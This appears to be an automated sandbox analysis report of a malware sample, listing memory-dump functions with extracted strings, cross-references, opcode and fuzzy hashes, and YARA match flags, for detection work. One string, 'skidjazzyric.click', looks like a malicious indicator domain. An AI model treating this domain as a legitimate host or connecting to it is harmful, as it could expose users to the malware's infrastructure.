Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A

Function 020FEE1A Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 020FEFB7
4b, xrefs: 020FF041
D, xrefs: 020FEFCF

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction ID: 526501ef6a38228875cb0bd02f302140ea3545a915131dee24677a73764f401b
Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
Instruction Fuzzy Hash: 3381296024C3828BD759CF39C4A136AFBD1AFD6218F18896DE1D28B691D379C40AD716

Function 020FEDC6 Relevance: 4.1, Strings: 3, Instructions: 313COMMON

Download Yara Rule

Strings

8<j?, xrefs: 020FEFB7
4b, xrefs: 020FF041
D, xrefs: 020FEFCF

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction ID: deaf2077832ae428806fcba84d73a475e398dbdf1575eacede54f4b9bdc0b2a2
Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
Instruction Fuzzy Hash: 4281286024C3828BD359CF39C4A137AFFD1AFD6218F18896DE1D28B691D379C40AD716

Function 00408F90 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

#=0, xrefs: 00408FC5
Z, xrefs: 004090E8
ut, xrefs: 004090E1

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: eba545bab416a68370d8833e2e81319f1cd74d48ef4740c2d23370f5f56f4d51
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 4681E23120C7829AD7058F39845026BBFE1AFA7314F1889AED4D1AB3C7D639C90AC756

Function 020D91F7 Relevance: 4.1, Strings: 3, Instructions: 304COMMON

Download Yara Rule

Strings

Z, xrefs: 020D934F
#=0, xrefs: 020D922C
ut, xrefs: 020D9348

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: #=0$Z$ut
API String ID: 0-1971374411
Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction ID: 1f3754e696545336788538003eb37c5c481d0a97812180d4d9b3379c6571218f
Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
Instruction Fuzzy Hash: 4081143110D3868BD7068F38C450B7AFFE1AF93218F1899ADD4D29B683D729D50AD752

Function 0042EBA1 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

8<j?, xrefs: 0042ED50
D, xrefs: 0042ED68
4b, xrefs: 0042EDDA

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A

Function 020FEE08 Relevance: 4.0, Strings: 3, Instructions: 290COMMON

Download Yara Rule

Strings

8<j?, xrefs: 020FEFB7
4b, xrefs: 020FF041
D, xrefs: 020FEFCF

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: 8<j?$D$4b
API String ID: 0-2390459867
Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction ID: a01287c1200f0bcb3331dc6bd7d16f9f144e6bc7e09ef18ab5a0a34d300018a4
Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
Instruction Fuzzy Hash: B681FA612483824BD359CF39C4A137AFFD29FD6218F1C496DE1D18B691D378C50ADB16

Function 02112F87 Relevance: 4.0, Strings: 3, Instructions: 282COMMON

Download Yara Rule

Strings

Cq, xrefs: 021130CD, 021131A1
NMNO, xrefs: 02113087
D`a&, xrefs: 0211313C

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: Cq$D`a&$NMNO
API String ID: 0-2451411959
Opcode ID: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction ID: d6d7d58f0dd9ec8f021f51a11f7a8d602c1ac8f9df8b72d5322b44fdc84dbb3b
Opcode Fuzzy Hash: 5cbc5e9f98f1ccd62bdde588abdd2110c86d4ae90a24e8516f9eedc10dd1988b
Instruction Fuzzy Hash: 6A8145316483554FD318DF28CC81A6BB7A3EFC5328F29C67CE9A547395DB3298098751

Function 00422380 Relevance: 2.9, Strings: 2, Instructions: 396COMMON

Download Yara Rule

Strings

:;, xrefs: 004223AC
Cq, xrefs: 00422736

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq$:;
API String ID: 0-3512244372
Opcode ID: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction ID: a8ce0ab78c4be7f089376efb71ad2075c1d737e56b9c5b96f1916c659004ebff
Opcode Fuzzy Hash: 6a52f198b57349a9125188c5d59238d1b2a42cd5f44dbda01648a119b6730dd6
Instruction Fuzzy Hash: FCA11972605320ABD7109F24ED8276B73E0EF85358F88852EF8959B391E3BCDD05875A

Function 020F25E7 Relevance: 2.9, Strings: 2, Instructions: 396COMMON

Download Yara Rule

Strings

Cq, xrefs: 020F299D
:;, xrefs: 020F2613

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: Cq$:;
API String ID: 0-3512244372
Opcode ID: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction ID: b6b286ac754591d18f394014c3e9ecf2551c991b93987e9f47491263e36cf1d4
Opcode Fuzzy Hash: 7fda9392dab92b0c76c3cf4899473e7ebc01ceaa019578965055405904a6ce5a
Instruction Fuzzy Hash: 66A11671A893109FD7519F24CC8276BB3E1EF81324F09852CEE959BA81E335ED06E752

Function 0043C5A0 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

Cq, xrefs: 0043C5CF, 0043C73A, 0043C7AF, 0043C91D
NP,?, xrefs: 0043C7C0

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq$NP,?
API String ID: 0-2242429526
Opcode ID: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction ID: f65ccde577a60585fc50111e68a200c88a0f1f1b3df19762a23bd62bb81c5e5c
Opcode Fuzzy Hash: 17216c8d87d4e8e81bd804f530d0a76fed2526bdcd0029c80ac48228635f7650
Instruction Fuzzy Hash: 5DA18E75A083209BD324DF19CCC173BB3A6EBC9324F19962EE995673D1D738AC018799

Function 0210C807 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

Cq, xrefs: 0210C836, 0210C9A1, 0210CA16, 0210CB84
NP,?, xrefs: 0210CA27

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: Cq$NP,?
API String ID: 0-2242429526
Opcode ID: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction ID: d5858cac1f181122d84ed7ee38ffc83d36b1b45fb70230136c53986190a0eae9
Opcode Fuzzy Hash: 9a5fae3dd16c561d9c5a6a93a9271e2a35235290781d04eedd2e3e01a9d132d7
Instruction Fuzzy Hash: 42A14771A843109BD724CF69C8C1B2BB3A6EBC9728F19872EE894572D0D7B19801CFD5

Function 0040DFE2 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

skidjazzyric.click, xrefs: 0040E33F
UXY^, xrefs: 0040E295

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: UXY^$skidjazzyric.click
API String ID: 0-1204630608
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: d4a14a9f2c2f0854964ffc34a88a484fd9aac6a31bc7c6ca58301aeff22ad83a
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: B79135B5504B418FD315CF2AC990622FBA2FF96300B188AACC0D24FB56C738E816CF95

Function 020DE249 Relevance: 2.8, Strings: 2, Instructions: 311COMMON

Download Yara Rule

Strings

UXY^, xrefs: 020DE4FC
skidjazzyric.click, xrefs: 020DE5A6

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: UXY^$skidjazzyric.click
API String ID: 0-1204630608
Opcode ID: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction ID: 235db1f10a406cfcd8c6da947c9677e69be4c9d0e9c847a7338906cca7868b6b
Opcode Fuzzy Hash: 6a3e78332c11f0f55536a65cbe22653fee9e07ab791520d2a790fd43c4da64a1
Instruction Fuzzy Hash: E09122B5605B818FD3158F29C990662FBE2FF96300B19869CC0D28FB56C779E806CF95

Function 00442470 Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

_\]R, xrefs: 00442490
Cq, xrefs: 0044252E, 0044265A

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID: InitializeThunk
String ID: Cq$_\]R
API String ID: 2994545307-1630559898
Opcode ID: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
Instruction ID: 67d2bc21efa779ec1b2302c596d4d55850990720b38256b1c81cc65d81c9891d
Opcode Fuzzy Hash: d1a17ae9281935e45702211bc9a64af948fb1502c71222f37c67c9fe5edd75b8
Instruction Fuzzy Hash: 729114315083119BD718DF28D9A0A2FB7E2EFD9314F59862DF48697391E774E802C78A

Function 021126D7 Relevance: 2.8, Strings: 2, Instructions: 294COMMON

Download Yara Rule

Strings

Cq, xrefs: 02112795, 021128C1
_\]R, xrefs: 021126F7

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: Cq$_\]R
API String ID: 0-1630559898
Opcode ID: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction ID: db9d840390706295f4a581e5fcb626801232608fdad0119e02d715c2390c7b01
Opcode Fuzzy Hash: ded7eeee8ad350a6afe0009bc7ce961d3544678ba9de2a86e57f9a76fab24472
Instruction Fuzzy Hash: 509127316483618BCB18DF28D850A6FB7E2EFD9324F19857CE8C587295E731E801C786

Function 00427490 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

yr, xrefs: 004275CE
o~, xrefs: 004275E6

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction ID: 9949b5826033667454bdd212c251d03fc0b1eef30724b4879d74d6325ed2a79f
Opcode Fuzzy Hash: c9d48b95859aed5604db22a7b535e1b994fc6fc23f247b972c2d66fa384cb495
Instruction Fuzzy Hash: 48913975A0C3208BD320DF19D84066BBBE2EFD5324F09892DE9D95B391E7B8C905C786

Function 020F76F7 Relevance: 2.8, Strings: 2, Instructions: 284COMMON

Download Yara Rule

Strings

o~, xrefs: 020F784D
yr, xrefs: 020F7835

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: o~$yr
API String ID: 0-1013308823
Opcode ID: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction ID: f3fadecdbbefbb39c2d68ad42e4392bf96c9137e40d94a2af61e5cd6723ca55f
Opcode Fuzzy Hash: f353fb7c42ac297e1fe1c84090b810e7596e2eb7232e841eeaea4071bc621b13
Instruction Fuzzy Hash: 839124769483508BD320DF18C840AABFBE2EFC5324F09892CE9C95B7A1E7B48505D787

Function 004427B0 Relevance: 2.7, Strings: 2, Instructions: 247COMMON

Download Yara Rule

Strings

Cq, xrefs: 004427C7, 00442886
=^"\, xrefs: 004428B7

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq$=^"\
API String ID: 0-3162832194
Opcode ID: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
Instruction ID: 31f6d952e69ddc92c57c3d15082e8394249c76af6de0d574896d183d93ceef01
Opcode Fuzzy Hash: 5d48baccbf68c9a420e3b87b0224fb92148870bc23ec7fb025ccf02abde862b7
Instruction Fuzzy Hash: 4281DE383052019BE724DF1CD990A2BB3E2EF89314F54866DF9858B3A0DB35EC51CB0A

Function 00428280 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 004282C5, 004282F6
:7$%, xrefs: 00428375

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction ID: 0de6392d9aeb990522659998ecc2397938767f988235b0ae13ec08bed24327b9
Opcode Fuzzy Hash: f10387fb3a1dea8b0350fba9c1e9ca61dc6ddde05eb87b29ee48f7488e223d9f
Instruction Fuzzy Hash: BA21F1701093908BD7089B69C865B6FFBE4AB86318F105A2DE1D2872D1DBB48809CB82

Function 020F84E7 Relevance: 2.6, Strings: 2, Instructions: 70COMMON

Download Yara Rule

Strings

:7$%, xrefs: 020F85DC
:7$%, xrefs: 020F855D, 020F852C

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: :7$%$:7$%
API String ID: 0-2391988857
Opcode ID: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction ID: 216d763bcea1e37e2cd30ae7a9ab1d11a6823bf67893218580882f4cecfeea5e
Opcode Fuzzy Hash: f03a1582adfb2917490f5b92725fb54028286632f3ed6b7bc30f9f8cb79f3731
Instruction Fuzzy Hash: 9E21AF711083908BD7489B69C9A5B6FFBE5BB86318F145A2DE1D287291DBB48409CB82

Function 020E6D15 Relevance: 2.6, Strings: 2, Instructions: 67COMMON

Download Yara Rule

Strings

Cq, xrefs: 020E6D98
, xrefs: 020E6D4C, 020E6D8F, 020E6DD2

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: Cq$
API String ID: 0-3968510582
Opcode ID: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
Instruction ID: 8b7dd92230e41d8edf0a3245beb450eab4aa90757e2eb9bf2c5795fecdf78f55
Opcode Fuzzy Hash: 59ebb6f1c1a99dc460b157ce1b0bc87d6a21890c15c4f19892189c2b52108220
Instruction Fuzzy Hash: A711E671A1C240AFD7608B24DD8676F73EAABD2324F288638D195CB1D1DB36D4808605

Function 020DAC99 Relevance: 2.6, Strings: 2, Instructions: 64COMMON

Download Yara Rule

Strings

MO, xrefs: 020DAC9E
MO, xrefs: 020DAC36

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: MO$MO
API String ID: 0-3148518880
Opcode ID: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction ID: 8a76466d75a31a38caf8f422f9f601f750e3d53be519500704c5930b462f4519
Opcode Fuzzy Hash: 15a7f7520f170cbb2b7e14720c3e61eb56271343ee20c45e820ed2ad2248e475
Instruction Fuzzy Hash: 07115A742453918BEF158FA89D95667BFA0EF46220F14AD989C855F38BC738C501CB64

Function 0044042D Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 0044049C
7&'$, xrefs: 00440445

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 095e66cfb836127910944c44464487434cf5069dbd9256ca3ed79a62a3e9a21d
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 02F09C745145544BEB918F7C98996BF67F0F713214F302BB5C65AE32A2C634C8914F0C

Function 02110694 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

vA\, xrefs: 02110703
7&'$, xrefs: 021106AC

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: 7&'$$vA\
API String ID: 0-2621209329
Opcode ID: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction ID: 2a3f0e262c1fdbb60ea8d2edd0416da0557e765cc8067687d83d5a5cb180de60
Opcode Fuzzy Hash: f2599c7c96a7284751bba45eaee817ab4aef05cb3a374ec363b854a8fb74a6dc
Instruction Fuzzy Hash: 20F068349545948BDB918F3D98996BE67F0F757214F202AB5CA9AE32A2C735C4C18F08

Function 00405AB0 Relevance: 1.9, APIs: 1, Instructions: 448COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
Instruction ID: c31a76099084191e3034c22a37ea28885ef806c0d431935db3893f7feff996f6
Opcode Fuzzy Hash: 782d56cc06f3b6973921e2512ebb950397a26f9326316825ec2b076d036e3b03
Instruction Fuzzy Hash: 92F1DE356087418FC724CF29C88066BFBE6EFD9300F08882EE5D597791E679E845CB96

Function 020E7AE4 Relevance: 1.8, APIs: 1, Instructions: 334COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 020E7E61

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID:
API String ID: 237503144-0
Opcode ID: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction ID: f1640622a3b6307a241f4417d2bf94ed80ec9ca6cd80473e72ca2cb2c2312afb
Opcode Fuzzy Hash: 6f91205ced5711e4090e4a0634995b8efc192ef3404d94e99f17bb35127df139
Instruction Fuzzy Hash: DAB103729087218BC714CF28C4917AAF7F2FFD9314F19962CE4C65B2A4E7349942C796

Function 00426C76 Relevance: 1.8, Strings: 1, Instructions: 581COMMON

Download Yara Rule

Strings

Cq, xrefs: 00426956

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq
API String ID: 0-995803806
Opcode ID: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction ID: d2e23a67c1903cd1e9c185385271eb72bcb916f6a4fd91b19e1fe5de6aa7faac
Opcode Fuzzy Hash: f0af6f60d34b4f0c8cbc000c65ea523940a6645594962f293f067da5df6a1c82
Instruction Fuzzy Hash: 4B122775B00226CBDB14CF68D8917AFB7B2FF8A300F5980A9C441AB3A5D7399D42DB54

Function 0041BEE1 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 0041C360, 0041C364

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction ID: 51f56407e220038c845c571476400c53c6676d21aaa49407b98741bf0e440936
Opcode Fuzzy Hash: 3b0b746955fa4b0b429feefe4d7ac8e528ed3bbb5661132fa39252583aba68ff
Instruction Fuzzy Hash: 589124756483108BC3148F28CC912ABB7E2EFD5354F18D92DE8D58B391E778C945C79A

Function 020EC148 Relevance: 1.6, Strings: 1, Instructions: 341COMMON

Download Yara Rule

Strings

'', xrefs: 020EC5C7, 020EC5CB

Memory Dump Source

Source File: 00000004.00000002.1712671753.00000000020D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 020D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_20d0000_D1F3.jbxd

Yara matches

Similarity

API ID:
String ID: ''
API String ID: 0-694448769
Opcode ID: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction ID: eff7eb57261d4809b66b961d0b8b46e848284e24672bd66216491a1dc21e9875
Opcode Fuzzy Hash: a548ca7d71b087bc765c9bc90a6e196857b17e46627d6a49092d6998d688bd5c
Instruction Fuzzy Hash: 959143B16083008BD7148F28C89126BB7E2EFC1364F18D92EE8D68B790E775C685D786

Function 00416ED0 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

*+, xrefs: 00417069

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: *+
API String ID: 0-2181965719
Opcode ID: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction ID: a6a176cfa994aee3612649f895d437fda5b17e7ce8ddb12fb8ae0738439bb6c9
Opcode Fuzzy Hash: 3410610abae8d48260fb0cfb57a2c63bba9af19cc751d7d22af9eb137d7409aa
Instruction Fuzzy Hash: 0BB177B15093818BD7318F25C8917EBBBF1EF96314F18892DD4C98B391EB384446CB8A

Function 00427070 Relevance: 1.5, Strings: 1, Instructions: 280COMMON

Download Yara Rule

Strings

Cq, xrefs: 00426956, 00427085

Memory Dump Source

Source File: 00000004.00000002.1712133603.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.1712133603.0000000000455000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_D1F3.jbxd

Similarity

API ID:
String ID: Cq
